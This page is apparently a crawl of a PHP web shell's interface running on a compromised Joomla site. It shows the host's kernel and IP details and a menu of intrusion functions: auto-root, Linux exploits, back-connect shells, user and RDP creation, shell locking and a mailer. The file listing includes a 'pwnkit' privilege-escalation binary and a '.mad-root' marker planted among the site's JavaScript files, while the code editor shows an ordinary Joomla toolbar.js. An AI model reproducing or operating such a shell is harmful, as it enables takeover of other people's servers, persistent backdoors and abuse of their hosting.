Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
legacy /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ajax-chosen.js
5.13
KB
-rw----r--
ajax-chosen.min.js
2.23
KB
-rw----r--
ajax-chosen.min.js.gz
1008
B
-rw----r--
joomla-chosen.js
4.07
KB
-rw----r--
joomla-chosen.min.js
2.05
KB
-rw----r--
joomla-chosen.min.js.gz
835
B
-rw----r--
jquery-noconflict.js
29
B
-rw----r--
jquery-noconflict.min.js
26
B
-rw----r--
jquery-noconflict.min.js.gz
46
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
tabs-state.js
7.01
KB
-rw----r--
tabs-state.min.js
2.26
KB
-rw----r--
tabs-state.min.js.gz
1.05
KB
-rw----r--
toolbar.js
1.46
KB
-rw----r--
toolbar.min.js
457
B
-rw----r--
toolbar.min.js.gz
291
B
-rw----r--
treeselectmenu.js
3.66
KB
-rw----r--
treeselectmenu.min.js
2.54
KB
-rw----r--
treeselectmenu.min.js.gz
697
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : toolbar.js
/** * @copyright (C) 2017 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ Joomla = window.Joomla || {}; (function(Joomla, document) { 'use strict'; /** * USED IN: libraries/joomla/html/toolbar/button/help.php * * Pops up a new window in the middle of the screen * * @param {string} mypage The URL for the redirect * @param {string} myname The name of the page * @param {int} w The width of the new window * @param {int} h The height of the new window * @param {string} scroll The vertical/horizontal scroll bars * * @since 4.0.0 */ Joomla.popupWindow = function(mypage, myname, w, h, scroll) { var winl = (screen.width - w) / 2, wint = (screen.height - h) / 2, winprops = 'height=' + h + ',width=' + w + ',top=' + wint + ',left=' + winl + ',scrollbars=' + scroll + ',resizable'; window.open(mypage, myname, winprops).window.focus(); }; document.addEventListener('DOMContentLoaded', function() { /** * Fix the alignment of the Options and Help toolbar buttons */ var toolbarOptions = document.getElementById('toolbar-options'), toolbarHelp = document.getElementById('toolbar-help'); if (toolbarHelp && !toolbarOptions) { toolbarHelp.classList.add('ms-auto'); } if (toolbarOptions && !toolbarHelp) { toolbarOptions.classList.add('ms-auto'); } }); })(Joomla, document);
Close